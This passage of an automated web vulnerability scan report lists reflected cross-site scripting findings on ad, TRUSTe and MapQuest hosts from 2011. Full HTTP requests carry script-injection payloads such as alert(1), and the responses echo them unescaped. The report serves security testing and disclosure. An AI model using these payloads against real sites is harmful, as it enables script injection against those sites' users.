GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609597ce"%3balert(1)//1b506363a98&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:54 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609597ce";alert(1)//1b506363a98&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ff2"%3balert(1)//a4f03f74c1f was submitted in the mpvc parameter. This input was echoed as 95ff2";alert(1)//a4f03f74c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2"%3balert(1)//a4f03f74c1f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:56 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2";alert(1)//a4f03f74c1fhttp://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.63. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 977b3<script>alert(1)</script>5107276f391 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1977b3<script>alert(1)</script>5107276f391&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont1977b3<script>alert(1)</script>5107276f391_ib = '<div id="te-clr1-att02cont1977b3<script>
...[SNIP]...

5.64. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 59666<script>alert(1)</script>9f57f5bbf8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25059666<script>alert(1)</script>9f57f5bbf8&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25059666<script>alert(1)</script>9f57f5bbf8,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

5.65. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 6c672<script>alert(1)</script>96972f9f81a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr6c672<script>alert(1)</script>96972f9f81a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr6c672<script>alert(1)</script>96972f9f81a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

5.66. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 92b40<script>alert(1)</script>42ea5cf0318 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=2092b40<script>alert(1)</script>42ea5cf0318&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':2092b40<script>alert(1)</script>42ea5cf0318,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

5.67. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9fcac<script>alert(1)</script>5500482d71b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr9fcac<script>alert(1)</script>5500482d71b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr9fcac<script>alert(1)</script>5500482d71b','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

5.68. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 94668<script>alert(1)</script>e6e4c609a49 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=30094668<script>alert(1)</script>e6e4c609a49&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':30094668<script>alert(1)</script>e6e4c609a49,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

5.69. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload e18f7<script>alert(1)</script>1968cdcc2c0 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002e18f7<script>alert(1)</script>1968cdcc2c0&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002e18f7<script>alert(1)</script>1968cdcc2c0','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed476<script>alert(1)</script>54ce9dc2f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverageed476<script>alert(1)</script>54ce9dc2f2f?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverageed476<script>alert(1)</script>54ce9dc2f2f was not found on this server.</p>
...[SNIP]...

5.71. http://coverage.mqcdn.com/coverage [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload a9775<script>alert(1)</script>de994233d1b was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csata9775<script>alert(1)</script>de994233d1b HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sata9775<script>alert(1)</script>de994233d1b'

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ce5e<script>alert(1)</script>96b4cb561f0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1138

MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8261<script>alert(1)</script>64e42659620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
